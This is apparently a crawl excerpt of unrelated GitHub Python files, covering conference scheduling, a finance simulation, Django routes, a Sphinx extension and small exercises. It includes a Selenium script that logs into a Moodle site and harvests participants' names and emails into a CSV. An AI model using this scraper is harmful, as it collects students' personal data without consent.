room_suitable.add(int(suitable_row[0]))\n\n rclass = room_class(room_available, room_suitable)\n if not rclass in room_classes:\n room_classes[rclass] = set()\n room_classes[rclass].add(rid)\n\n c.execute('DELETE FROM rooms')\n c.execute('DELETE FROM room_available')\n c.execute('DELETE FROM room_suitable_for')\n c.execute('DELETE FROM room_class_member')\n c.execute('DELETE FROM room_class_members')\n conn.commit()\n\n rclass_id = 0\n member_defined = set()\n for rclass, rooms_in_class in room_classes.iteritems():\n c.execute('INSERT INTO rooms values (?, ?, ?)', (rclass_id, 'Room class %d' % rclass_id, len(rooms_in_class)))\n for room_in_class in rooms_in_class:\n if not room_in_class in member_defined:\n 
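# record each physical room's display name once, keyed by its original rid\n                        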
c.execute('INSERT INTO room_class_member VALUES (?, ?)', (room_in_class, rooms[room_in_class]))\n member_defined.add(room_in_class)\n c.execute('INSERT INTO room_class_members VALUES (?, ?)', (rclass_id, room_in_class))\n for hid in rclass.available:\n c.execute('INSERT INTO room_available VALUES (?, ?)', (rclass_id, hid))\n for tid in rclass.suitable:\n c.execute('INSERT INTO room_suitable_for VALUES (?, ?)', (rclass_id, tid))\n rclass_id += 1\n conn.commit()\n\n with open('2013_real_attendance.csv') as csvfile:\n reader = csv.reader(csvfile)\n attendee_rsvps = {}\n tids_already_processed = {}\n while aid < num_attendees:\n c.execute('INSERT INTO attendee VALUES (?)', (aid,))\n attendee_rsvps[aid] = set()\n aid += 1\n aid_range = range(0, num_attendees)\n for row in reader:\n talk_name = row[0]\n row_tids = c.execute('SELECT tid FROM talks WHERE name = ?', (talk_name,)).fetchall()\n if len(row_tids) == 0:\n #print 'Unable to find tid for %s' % talk_name\n continue\n tid = int(row_tids[0][0])\n if tid > max_tid:\n continue\n if not tid in tids_already_processed:\n tids_already_processed[tid] = 0\n real_attendance = int(row[3])\n if real_attendance >= num_attendees:\n real_attendance = num_attendees\n for i in range(tids_already_processed[tid], real_attendance):\n max_aid = len(aid_range) - 1\n if tdist == 1:\n aid = random.choice(aid_range)\n else:\n aid = int(sigma_ratio * max_aid * numpy.random.randn()) + int(max_aid / 2)\n while aid < 0 or aid > max_aid:\n aid = int(sigma_ratio * max_aid * numpy.random.randn()) + int(max_aid / 2)\n while (tid in attendee_rsvps[aid]) or (len(attendee_rsvps[aid]) >= num_hours):\n if tdist == 1:\n aid = random.choice(aid_range)\n else:\n aid = int(sigma_ratio * max_aid * numpy.random.randn()) + int(max_aid / 2)\n while aid < 0 or aid > max_aid:\n aid = int(sigma_ratio * max_aid * numpy.random.randn()) + int(max_aid / 2)\n attendee_rsvps[aid].add(tid)\n c.execute('INSERT INTO attendee_interest VALUES (?, ?)', (aid, tid))\n tids_already_processed[tid] = real_attendance\n\n else:\n while aid < num_attendees:\n c.execute('INSERT INTO attendee VALUES (?)', (aid,))\n rsvps = set()\n i = 0\n while i < num_rsvps:\n if distribution == 'uniform':\n tid = random.choice(tid_range)\n else:\n tid = int(sigma_ratio * max_tid * numpy.random.randn()) + int((max_tid/2))\n while tid < 0 or tid > max_tid:\n tid = int(sigma_ratio * max_tid * numpy.random.randn()) + int((max_tid/2))\n if tid in rsvps:\n continue\n else:\n rsvps.add(tid)\n i += 1\n c.execute('INSERT INTO attendee_interest VALUES (?, ?)', (aid, tid))\n aid += 1\n\n conn.commit()\n conn.close()\n","repo_name":"jquesnelle/convention-scheduling","sub_path":"code/setupdb.py","file_name":"setupdb.py","file_ext":"py","file_size_in_byte":8223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"18058074242","text":"from qe_financial_spillover.src.fund import Fund\nfrom qe_financial_spillover.src.asset import Asset\nfrom qe_financial_spillover.src.functions import *\nfrom qe_financial_spillover.src.functions.distribute import *\nfrom qe_financial_spillover.src.functions.stochasticprocess import ornstein_uhlenbeck_levels\nimport random\nimport numpy as np\n\n\ndef init_funds(identifiers_funds, lambdas, thetas, phis, phis_p, phis_x, regions, std_noises, asset_dict):\n #Instantiate investor funds using the number of identifiers as range\n fund_list = []\n # Loop over number of funds\n for ident, lambda_ , theta, phi , phi_p , phi_x, std_noise in 
zip(identifiers_funds, lambdas, thetas, phis, phis_p, phis_x, std_noises):\n # Instantiate fund object\n fund = Fund(ident, lambda_, theta, phi, phi_p, phi_x, std_noise)\n # Save in list\n fund_list.append(fund)\n\n fund_regions = distribute_funds_equally(len(identifiers_funds), regions)\n # Attach region to funds\n count_domestic = 0\n count_foreign = 0\n for fund, region_label in zip(fund_list, fund_regions):\n fund.parameters['region'] = region_label\n if \"domestic\" in fund.parameters['region']:\n count_domestic+=1\n if \"foreign\" in fund.parameters['region']:\n count_foreign += 1\n\n # Give balance sheets items to funds\n for index, i in asset_dict.iteritems():\n # exclude cash, because only funds in the region hold cash\n if \"cash\" not in i.identifier:\n asset_quantity = distribute_funds_equally(len(identifiers_funds), [i.parameters['global_supply']/len(identifiers_funds)])\n\n for fund, quantity in zip(fund_list, asset_quantity):\n # We save a the object and quantity inside a dictionary attached to the fund\n fund.assets[i] = quantity\n if \"cash\" in i.identifier:\n # #check in which region we are\n for fund in fund_list:\n # print fund.parameters['region'], fund.identifier, i.identifier\n if \"domestic\" in fund.parameters['region'] and \"domestic\" in i.identifier:\n fund.assets[i] = i.parameters['global_supply']/count_domestic\n if \"foreign\" in fund.parameters['region'] and \"foreign\" in i.identifier:\n fund.assets[i] = i.parameters['global_supply'] / count_foreign\n fund_size = 0\n # # Allocate fund size\n for fund in fund_list: # TODO Liabilities is the sum of asset_quantity * price over all assets; price of bonds is initialised with 1 and cash doesn't have a price\n for key, value in fund.assets.iteritems():\n\n fund_size += value\n fund.liabilities = fund_size\n\n return fund_list\n\ndef get_fund_size(funds):\n global_capital = 0\n for fund in funds:\n global_capital+= fund.liabilities\n return global_capital\n\ndef init_assets(regions, identifiers_assets, ms, rhos, omegas, face_values, global_supply, prices):\n # Instantiate investor funds using the number of identifiers as range\n asset_dict = {}\n for ident, m, rho, omega, face_value, global_supply, price in zip(identifiers_assets, ms, rhos, omegas, face_values,global_supply, prices):\n # Instantiate fund object\n asset = Asset(ident, m, rho, omega, face_value, global_supply, price)\n # Save in dict - hard coded; not elegant and problematic if there are more regions\n asset_dict[ident] = asset\n\n if \"domestic\" in asset.identifier:\n asset.parameters['region'] = \"domestic\"\n if \"foreign\" in asset.identifier:\n asset.parameters['region'] = \"foreign\"\n\n\n\n return asset_dict\n\ndef init_price_history(assets, backward_simulated_time): #Todo: take the same price histry for all assets? 
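(right now a single shared Ornstein-Uhlenbeck path is generated and attached to every non-cash asset.) 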
If not simulate inside loop\n \"\"\"generate price history using mean reversion process and add to assets\"\"\"\n price_history = ornstein_uhlenbeck_levels(time=backward_simulated_time, init_level=1,\n long_run_average_level=1, sigma=0.025)\n price_history.reverse()\n for key, asset in assets.iteritems():\n if not 'cash' in key:\n asset.prices_history = price_history\n\n\ndef init_exp_default_probabilities(assets, funds):\n for fund in funds:\n for key, value in assets.iteritems():\n fund.exp_default_probability[key] = value.parameters['omega']\n # cash has 0 as attribute\n if \"cash\" in key:\n fund.exp_default_probability[key] = 0\n\n #Also add keys, value pairs for realised returns and intermediate realised returns\n fund.realised_returns_intermediate[key] = 0\n fund.realised_returns[key] = 0\n\n\ndef init_ewma_price(assets, funds, exchange_rate):\n for fund in funds:\n for key, value in assets.iteritems():\n fund.ewma_price[key] = value.prices[-1]\n fund.ewma_price_intermediate[key] = 0\n\n # cash has 0 as attribute\n if \"cash\" in key:\n fund.ewma_price[key] = 0\n fund.ewma_price[key] = 0\n\n #Initialise ewma with the first exchange rate past into main simulation file\n fund.ewma_x['x_domestic_to_foreign'] = exchange_rate['x_domestic_to_foreign'][-1]\n fund.ewma_x_intermediate['x_domestic_to_foreign'] = 0\n\ndef init_news_process(asset_dict, days):\n for key, asset in asset_dict.iteritems():\n if \"cash\" not in key:\n asset.news_process = ornstein_uhlenbeck_levels(days)","repo_name":"wxyrc5/WhiteRhino","sub_path":"examples/qe_financial_spillover/src/initialisation.py","file_name":"initialisation.py","file_ext":"py","file_size_in_byte":5544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"71290526322","text":"import os\nimport csv\nfrom selenium import webdriver\nfrom selenium.webdriver.firefox.options import Options\n\n# ENTER Credentials\nuserName = \"USERNAME\"\nmypass = \"PASSWORD\"\ncourseID = \"Enter Your Course ID from URL\"\n\n# Enable headless browser\noptions = Options()\noptions.headless = True\n\n# disable image loading\nfirefox_profile = webdriver.FirefoxProfile()\nfirefox_profile.set_preference('permissions.default.image', 2)\nfirefox_profile.set_preference('dom.ipc.plugins.enabled.libflashplayer.so', 'false')\n\ndriver = webdriver.Firefox(options=options,firefox_profile=firefox_profile)\n\n# LOGIN TO MOODLE\ndriver.get(\"http://tmoodle.fccollege.edu.pk/moodle/login/index.php\")\ndriver.find_element_by_xpath('//*[@id=\"username\"]').send_keys(userName)\ndriver.find_element_by_xpath('//*[@id=\"password\"]').send_keys(mypass)\ndriver.find_element_by_xpath('//*[@id=\"loginbtn\"]').click()\n\n# Goto course participants page with show all enabled\ndriver.get(\"http://tmoodle.fccollege.edu.pk/moodle/user/index.php?id=\"+courseID+\n \"&perpage=100\")\n\ndata = []\n\npeeps_elem = driver.find_elements_by_xpath(\"/html/body/div[1]/div[2]/div/div/section/div/div/div/div[2]/div[3]/table/tbody/tr/td/a\")\nfor each in peeps_elem:\n url = each.get_attribute(\"href\")\n driver.execute_script('window.open(\"{}\", \"_blank\");')\n driver.switch_to.window(driver.window_handles[1])\n driver.get(url)\n\n try:\n name = driver.find_element_by_xpath('//*[@id=\"region-main\"]/div/div/div/div/div[1]/div[2]/h2').text\n\n email = driver.find_element_by_xpath('//*[@id=\"region-main\"]/div/div/div/div/div/section[1]/ul/li/dl/dd/a').text\n\n except Exception as e:\n email = \"N/A\"\n print(e)\n\n print(name, email)\n\n text = [name,email]\n\n # Save 
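the rows gathered so far, rewriting students.csv from scratch on every\n    # pass so a crash mid-run still leaves usable output.\n    # Save 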
data to csv\n data.append(text)\n\n with open('students.csv', 'w') as data_file:\n writer = csv.writer(data_file)\n writer.writerows(data)\n\n driver.close()\n driver.switch_to.window(driver.window_handles[0])\n","repo_name":"imasimali/moodle-scrape","sub_path":"moodle-scraper.py","file_name":"moodle-scraper.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"17852466634","text":"from django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n path('',views.inicio , name =\"Inicio\"), \n\n path('alta_usuarios', views.alta_usuarios, name=\"AgregarUsuario\"),\n path('alta_articulos',views.alta_articulos, name=\"AgregarArticulo\"),\n path('alta_vendedores',views.alta_vendedores, name=\"AgregarVendedor\"),\n# mensajes usuario\n path('comentar', views.comentar, name=\"EnviarMensaje\" ),\n path('comentar/', views.comentar, name=\"EnviarMensaje\" ),\n \n path('mensajes', views.mensajes, name=\"Mensajes\" ),\n path('mensajes/', views.mensajes, name=\"Mensajes\" ),\n#mensajes vendedor\n\n path('comentarVendedor', views.comentar_vendedor, name=\"EnviarMensajeVendedor\" ),\n path('comentarVendedor/', views.comentar_vendedor, name=\"EnviarMensajeVendedor\" ),\n \n path('mensajesVendedor', views.mensajes_vendedor, name=\"MensajesVendedor\" ),\n path('mensajesVendedor/', views.mensajes_vendedor, name=\"MensajesVendedor\" ),\n\n#mensajes articulos\n\n path('comentarArticulo', views.comentar_articulos, name=\"EnviarMensajeArticulo\" ),\n path('comentarArticulo/', views.comentar_articulos, name=\"EnviarMensajeArticulo\" ),\n \n path('mensajesArticulo', views.mensajes_articulos, name=\"MensajesArticulo\" ),\n path('mensajesArticulo/', views.mensajes_articulos, name=\"MensajesArticulo\" ),\n\n\n\n path('usuarios', views.usuarios, name=\"usuarios\"),\n path('articulos', views.articulos, name=\"articulos\"), \n path('vendedores', views.vendedores, name=\"vendedores\"),\n path('about', views.about , name=\"about\" ), \n\n path('buscar',views.buscar, name=\"buscar\"),\n path('busqueda',views.busqueda, name = \"busqueda\"),\n path('buscar_articulo',views.buscar_articulo , name = \"buscar_articulo\" ),\n path('busqueda_articulo',views.busqueda_articulo, name = \"busqueda_articulo\"), \n path('buscar_vendedor',views.buscar_vendedor, name = \"buscar_vendedor\"),\n path('busqueda_vendedor',views.busqueda_vendedor, name = \"busqueda_vendedor\"),\n\n path('eliminar_articulo/', views.eliminar_articulo, name=\"EliminarArticulo\"),\n path('eliminar_vendedor/', views.eliminar_vendedor, name=\"EliminarVendedor\"),\n path('eliminar_usuario/', views.eliminar_usuario, name=\"EliminarUsuario\"),\n\n path('editar_articulo/', views.editar_articulo, name=\"EditarArticulo\"),\n path('editar_articulo/', views.editar_articulo, name=\"EditarArticulo\"),\n path('editar_vendedor/', views.editar_vendedor, name=\"EditarVendedor\"),\n path('editar_vendedor/', views.editar_vendedor, name=\"EditarVendedor\"),\n path('editar_usuario/', views.editar_usuario, name=\"EditarUsuario\"),\n path('editar_usuario/', views.editar_usuario, name=\"EditarUsuario\"),\n path('login/' , include(\"login.urls\")),\n path('perfil/', views.perfil, name=\"Perfil\"),\n path('cargar_avatar/', views.cargar_avatar, 
name=\"Cargar_avatar\"),\n]","repo_name":"AquinoGaston/Entrega1AquinoGaston","sub_path":"app_fam/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"23759362307","text":"import sphinx.roles as mod\nfrom docutils.nodes import Text\nfrom docutils.parsers.rst import roles\n\n\ndef new_literal_role(typ, rawtext, text, lineno, inliner, options=None,\n content=None, old_role=None):\n \"\"\"Extends the literal role handler to allow replace substitutions.\"\"\"\n\n node, _ = old_role(typ, rawtext, text, lineno, inliner, options,\n content)\n doc = inliner.document\n\n replacements = [(i.attributes['names'][0], i.children[0])\n for i in doc.substitution_defs.values()]\n\n # some items due for replacement are stored as config values\n replacements.append(('version', Text(doc.settings.env.config.version)))\n\n for rep in replacements:\n node[0][0] = Text(node[0][0].replace('|' + rep[0] + '|', rep[1]))\n\n return node, _\n\n\ndef setup(app):\n \"\"\"Overrides literal role handlers.\"\"\"\n\n # Inject the old_role keyword argument to ensure a seamless override.\n def spliced_role(*arg, **kwarg):\n return new_literal_role(*arg, old_role=mod.emph_literal_role, **kwarg)\n\n # Select all literal role names.\n names = [key for key, value in mod.specific_docroles.items()\n if value is mod.emph_literal_role]\n\n # Override all literal roles with the extended handler.\n for name in names:\n roles.register_local_role(name, spliced_role)\n","repo_name":"Mustafa201611/unit-docs","sub_path":"source/exts/inline.py","file_name":"inline.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"12517023940","text":"h=10\nr=5\nf=15\nVtank=3.14*(r)**2*h\nt=int(input('Enter time='))\nVwater=f*t\nif Vwater>Vtank:\n\tprint('Overflow')\n\tprint('Volume',Vwater-Vtank)\nelif Vwater==Vtank:\n\tprint('Fill')\nelse:\n\tprint('Underflow')\n\tht=Vwater/(3.14*(r)**2)\n\thr=h-ht\n\tprint('Filled height=',round(ht,2),'Remaining height=',round(hr,2))\n","repo_name":"Ritika-Brewal/Python-lab","sub_path":"pro7.py","file_name":"pro7.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10441613620","text":"# Mean Means\r\n# https://www.codewars.com/kata/57c6b44f58da9ea6c20003da/train/python\r\n\r\n# 나의 풀이\r\nfrom functools import reduce\r\ndef geo_mean(nums, arith_mean):\r\n l = len(nums)+1\r\n nums.append(arith_mean*l-sum(nums))\r\n return reduce(lambda x, y: x*y, nums)**(1/l)\r\n\r\n# 다른 사람의 풀이\r\nfrom operator import mul\r\ndef geo_mean1(nums, mean):\r\n nums.append(mean*(len(nums)+1)-sum(nums))\r\n return reduce(mul, nums) ** (1/len(nums))\r\n\r\nfrom math import prod\r\ndef geo_mean2(nums, arith_mean):\r\n nums.append(arith_mean * (len(nums)+1) - sum(nums))\r\n return prod(nums)**(1/len(nums))\r\n\r\nprint(geo_mean([2], 10), 6)\r\nprint(geo_mean([1, 2], 3), 2.2894284851066637)\r\nprint(geo_mean([4, 6, 7, 2], 5), 4.580344097847165)","repo_name":"whyj107/CodeWar","sub_path":"20221228_Mean Means.py","file_name":"20221228_Mean Means.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41143877510","text":"class Solution(object):\n def myAtoi(self, str):\n \"\"\"\n :type str: str\n :rtype: int\n \"\"\"\n re = 
sys.modules[\"re\"]\n patternA = re.compile(r\" *[+-]?\\d+.*\")\n patternB = re.compile(r\"[+-]?\\d+\")\n \n if(patternA.match(str) == None):\n return 0\n else:\n strA = patternB.findall(str)[0]\n if(strA[0] == \"+\"):\n x = int(strA[1:])\n elif(strA[0] == \"-\"):\n x = -1 * int(strA[1:])\n else:\n x = int(strA)\n \n if(x >= pow(2, 31)):\n return pow(2, 31) - 1\n elif(x <= -1*pow(2, 31)):\n return -1*pow(2, 31)\n else:\n return x","repo_name":"lifeng1992/LeetcodeByLifeng1992","sub_path":"Python/008.py","file_name":"008.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21106737169","text":"import numpy as np\n\ntolerance = 0.00000001\niterations_limit = 7\n\ndef broyden(x0_vector, initial_approx_Jacobian, f_vector):\n\n x_vector = x0_vector\n approx_Jacobian = initial_approx_Jacobian\n for iteration in range(iterations_limit):\n\n jacobian_current_values = approx_Jacobian\n function_current_values = f_vector(x_vector)\n \n delta_x = -1*(np.matmul(np.linalg.inv(jacobian_current_values),\n function_current_values))\n\n x_vector = x_vector + delta_x\n delta_f = f_vector(x_vector) - function_current_values\n\n if(np.linalg.norm(delta_x)/np.linalg.norm(x_vector) \\\n < tolerance):\n return x_vector\n else:\n jacob_correction = ((delta_f - approx_Jacobian \n @ delta_x) @ np.transpose(delta_x))\\\n /(np.transpose(delta_x) @ delta_x)\n approx_Jacobian = approx_Jacobian + jacob_correction\n\n return \"Convergence not reached: \\n\" + str(x_vector)\n\ndef f_vector(x_vector):\n return np.array([[x_vector[0][0] + 2*x_vector[1][0] - 2.0], \n [pow(x_vector[0][0], 2) + 4*pow(x_vector[1][0], 2) - 4]])\n\nprint(broyden(np.array([[2], [3]]), np.array([[1, 2], [4, 24]]), f_vector))\n","repo_name":"JonathanAlcantara/NumericalLinearAlgebra_Applications","sub_path":"RootFinding/broyden.py","file_name":"broyden.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13429154525","text":"from dependency_injector import containers, providers\n\nfrom src.domain.users.repositories.user_repository import UserRepository\nfrom src.domain.users.services import (\n CreateUserService,\n ListUserService,\n DetailUserService\n)\n\n\nclass UserContainer(containers.DeclarativeContainer):\n\n db = providers.Dependency()\n\n user_repository = providers.Factory(\n UserRepository,\n session_factory=db.provided.session,\n )\n\n create_user_service = providers.Factory(\n CreateUserService,\n repository=user_repository\n )\n\n list_user_service = providers.Factory(\n ListUserService,\n repository=user_repository\n )\n\n detail_user_service = providers.Factory(\n DetailUserService,\n repository=user_repository\n )\n","repo_name":"Genial-Ideias/boilerplate-fastapi","sub_path":"src/infra/containers/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"19271479444","text":"import pickle\nimport random\nimport whois\nimport urllib2\nimport re\nfrom bs4 import BeautifulSoup\n\n__author__ = 'kongaloosh'\n\ndef random_domain():\n pass\n\n\ndef domainify():\n \"\"\"Returns a random domain where the last characters form a TLD\"\"\"\n results = open('results','r')\n domains = []\n try:\n while True:\n domains.append(pickle.load(results))\n\n except EOFError:\n while True:\n pick = domains[random.randint(0, 
(len(domains))-1)]\n print(pick[0])\n definition = find(pick[0][0])\n if definition:\n results = []\n for (word,tld) in pick:\n try:\n domain = word[:len(word)-len(tld)] + '.' + tld\n if whois.whois(domain)[\"expiration_date\"]:\n results.append({'domain':domain, 'definition':definition})\n except (UnboundLocalError, KeyError):\n pass\n except whois.parser.PywhoisError: # this isn't 100% accurate\n results.append({'domain':domain, 'definition':definition})\n if len(results)>0:\n return results[random.randint(0, (len(results))-1)]\ndef find(word):\n print(word)\n try:\n x=urllib2.urlopen(\"http://dictionary.reference.com/browse/\"+word+\"?s=t\")\n except:\n return None\n\n x=x.read()\n soup = BeautifulSoup(x, 'html.parser')\n defs = soup.find_all('div', class_=\"def-content\")\n defs = [d.text for d in defs]\n if defs: return defs\n\n items=re.findall('','')\n m=re.findall('at Dictionary.com, a free online dictionary with pronunciation, synonyms and translation. Look it up now! \"/>',z)\n if m==[]:\n if z.startswith(\"Get your reference question answered by Ask.com\"):\n return None\n else:\n return z\n else:\n return None\n\nif __name__ == \"__main__\":\n find('dream')","repo_name":"Kongaloosh/word_search","sub_path":"domain_getter.py","file_name":"domain_getter.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6817113006","text":"temp = []\nlista = []\nmaior = menor = 0\nwhile True:\n temp.append(str(input('Nome : ')).strip())\n temp.append( float(input('Peso : ')))\n if len(lista) == 0:\n maior = menor = temp[1]\n else:\n if temp[1] > maior:\n maior = temp[1]\n if temp[1] < menor:\n menor = temp[1]\n lista.append(temp[:])\n temp.clear()\n continuar = ' '\n while continuar not in 'SN':\n continuar = str(input('Deseja continuar [S/N] ? 
')).strip().upper()\n    if continuar == 'N':\n        break\nprint(f'-='*20)\nprint(f'Foram cadastradas {len(lista)} pessoas')\nprint(f'O maior peso foi de {maior}KG. Peso de :',end=' ')\nfor p in lista:\n    if p[1] == maior:\n        print(f'[{p[0]}]',end=',')\nprint()\nprint(f'O menor peso foi de {menor}KG. Peso de :',end=' ')\nfor p in lista:\n    if p[1] == menor:\n        print(f'[{p[0]}]',end=',')","repo_name":"paulovictor1997/Python","sub_path":"Listas/desafio84.py","file_name":"desafio84.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"}
{"seq_id":"21479880593","text":"#!/usr/bin/env python3\nimport sys \n\nif len(sys.argv) < 3:\n    raise ValueError(\"Usage: ./main.py result.log ldm\")\n\nfp = open(sys.argv[1], \"r\")\nldm = int(sys.argv[2])\n\ntime_li = []\nfor line in fp:\n    if \"MPI time (ms)\" in line:\n        time = line.strip(\"MPI time (ms)\").strip('\\n')\n        print(time)\n        time_li.append(float(time))\n    if \"Time (ms)\" in line:\n        time = line.strip(\"Time (ms):\").strip('\\n')\n        print(time)\n        time_li.append(float(time))\nfp.close()\n\nfout = open(sys.argv[1].strip(\".log\")+\".csv\", 'w')\n# fout.write(\"Dataset,Time (ms)\\n\")\n# print(time_li)\n\ncnt = 0\nfor time_val in time_li:\n    if (cnt + 1) % ldm == 0:\n        fout.write(\"{}\\n\".format(time_val))\n    else:\n        fout.write(\"{},\".format(time_val))\n    cnt += 1\nfout.close()","repo_name":"YukeWang96/MGG_OSDI23","sub_path":"analysis_profile.py","file_name":"analysis_profile.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"75"}
{"seq_id":"28467074818","text":"from packaging import version\nimport sklearn\n\nassert version.parse(sklearn.__version__) >= version.parse(\"1.0.2\")\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn.neighbors import KNeighborsRegressor\n\n#DataLoad\n\n#download data:\nimport urllib.request\ndata_root = \"https://github.com/ageron/data/raw/main/\"\nlifesat = pd.read_csv(data_root + \"lifesat/lifesat.csv\")\nX = lifesat[[\"GDP per capita (USD)\"]].values\ny = lifesat[[\"Life satisfaction\"]].values\n\n#\nlifesat.loc[lifesat['Country']==\"Turkey\"]\n#plot\n\nlifesat.plot(kind=\"scatter\",x='GDP per capita (USD)'\n             ,y='Life satisfaction'\n             )\nplt.show()\n\n#plot with axis limits\n\nlifesat.plot(kind=\"scatter\",x='GDP per capita (USD)'\n             ,y='Life satisfaction'\n             )\nplt.axis([23_500,62_500,4,9])\nplt.show()\n\n\n\nmodel2=KNeighborsRegressor()\nmodel2.fit(X,y)\n\ny_pred=model2.predict(X)\n\n#test our model\nX_new=[[27287.08]]\nprint(model2.kneighbors(X_new))\n\n#validation\nfrom sklearn.metrics import mean_squared_error\n\n\nmean_squared_error(y, y_pred)\n\n","repo_name":"hanyeh00/machine-learning","sub_path":"classificationExample/KNN_sklearn.py","file_name":"KNN_sklearn.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"}
{"seq_id":"38121643606","text":"from typing import List\r\n\r\nclass Solution:\r\n    def findKthLargest(self, nums: List[int], k: int) -> int:\r\n        \r\n        self.arrSize = len(nums)\r\n        \r\n\r\n        self.heapSort(nums, self.arrSize)\r\n        \r\n        if k == 1:\r\n            return nums[-1]\r\n\r\n        if len(nums) < k:\r\n            return nums[-1]\r\n\r\n        return nums[(-k)]\r\n\r\n\r\n\r\n    def parentOfElement(self, i: int) -> int:\r\n        return ((i - 1)//2)\r\n\r\n    def leftOfElement(self, i: int) -> int:\r\n        return (2*i+1)\r\n\r\n    def rightOfElement(self, i: int) -> int:\r\n        
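# children of heap node i sit at indices 2*i+1 and 2*i+2 in the 0-based array\r\n        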
return (2*i+2)\r\n\r\n def maxHeapify(self, nums: List[int], key: int):\r\n left = self.leftOfElement(key)\r\n right = self.rightOfElement(key)\r\n length = self.arrSize\r\n\r\n if left < length and nums[left] > nums[key]:\r\n largest = left\r\n\r\n else:\r\n largest = key\r\n\r\n if right < length and nums[right] > nums[largest]:\r\n largest = right\r\n\r\n if largest != key:\r\n temp = nums[key]\r\n nums[key] = nums[largest]\r\n nums[largest] = temp\r\n self.maxHeapify(nums, largest)\r\n\r\n def buildMaxHeap(self, nums: List[int], size: int):\r\n self.arrSize = size\r\n for index in reversed(range(0,(size//2))):\r\n self.maxHeapify(nums, index)\r\n \r\n def heapSort(self, nums: List[int], size: int):\r\n self.buildMaxHeap(nums, size)\r\n \r\n for i in reversed(range(1, size)):\r\n temp = nums[0]\r\n nums[0] = nums[i]\r\n nums[i] = temp\r\n self.arrSize = self.arrSize - 1\r\n self.maxHeapify(nums, 0)\r\n\r\narray = [7,6,5,4,3,2,1]\r\ntest = Solution()\r\nresult = test.findKthLargest(nums=array, k=2)\r\nprint(result)\r\n\r\n\r\n","repo_name":"TheZenithTree/ATU-COMS3213","sub_path":"kthElement.py","file_name":"kthElement.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28709048469","text":"from random import choice\r\n\r\nnouns = [\"fossil\",\t\"horse\",\t\"aardvark\",\t\"judge\",\t\"chef\",\t\"mango\",\t\"extrovert\", \"gorilla\"]\r\nverbs = [\"kicks\",\t\"jingles\",\t\"bounces\",\t\"slurps\",\t\"meows\",\t\"explodes\",\t\"curdles\"]\r\nadjectives = [\"furry\",\t\"balding\",\t\"incredulous\",\t\"fragrant\",\t\"exuberant\",\t\"glistening\"]\r\nprepositions = [\"against\",\t\"after\",\t\"into\",\t\"beneath\",\t\"upon\",\t\"for\",\t\"in\",\t\"like\",\t\"over\", \"within\"]\r\nadverbs = [\"curiously\", \"extravagantly\",\t\"tantalizingly\",\t\"furiously\",\t\"sensuously\"]\r\n\r\n\r\ndef makepoem():\r\n\r\n # pull up 3 nouns\r\n n1 = choice(nouns)\r\n n2 = choice(nouns)\r\n n3 = choice(nouns)\r\n while n1 == n2:\r\n n2 = choice(nouns)\r\n while n2 == n3 or n1 == n3:\r\n n3 = choice(nouns)\r\n\r\n # pull up 3 verbs\r\n v1 = choice(verbs)\r\n v2 = choice(verbs)\r\n v3 = choice(verbs)\r\n while v1 == v2:\r\n v2 = choice(verbs)\r\n while v2 == v3 or v3 == v1:\r\n v3 = choice(verbs)\r\n\r\n # pull up 3 adjectives\r\n a1 = choice(adjectives)\r\n a2 = choice(adjectives)\r\n a3 = choice(adjectives)\r\n while a1 == a2:\r\n a2 = choice(adjectives)\r\n while a2 == a3 or a3 == a1:\r\n a3 = choice(adjectives)\r\n\r\n # pull up 2 prepositions\r\n p1 = choice(prepositions)\r\n p2 = choice(prepositions)\r\n while p1 == p2:\r\n p2 = choice(prepositions)\r\n\r\n # pull up 1 adverb\r\n av1 = choice(adverbs)\r\n\r\n if \"aeiouy\".find(a1) != -1:\r\n a = \"A\"\r\n else:\r\n a = \"An\"\r\n\r\n poem = f\"\"\"{a} {a1} {n1} \\n{a} {a1} {n1} {v1} {p1} the {a2} {n2} \\n{av1}, the {n1} {v2} \\nthe {n2} {v3} {p2} a {a3}\r\n {n3}\"\"\"\r\n return poem\r\n\r\npoetic = print(makepoem())\r\n","repo_name":"Zawadidone/learning-python","sub_path":"RealPython/RealPythonPart1/poetry.py","file_name":"poetry.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32772616190","text":"class Stack: \n def __init__(self): \n self.elements = [] \n \n def push(self, data): \n self.elements.append(data) \n return data \n \n def pop(self): \n if len(self.elements) > 0:\n return self.elements.pop() \n \n 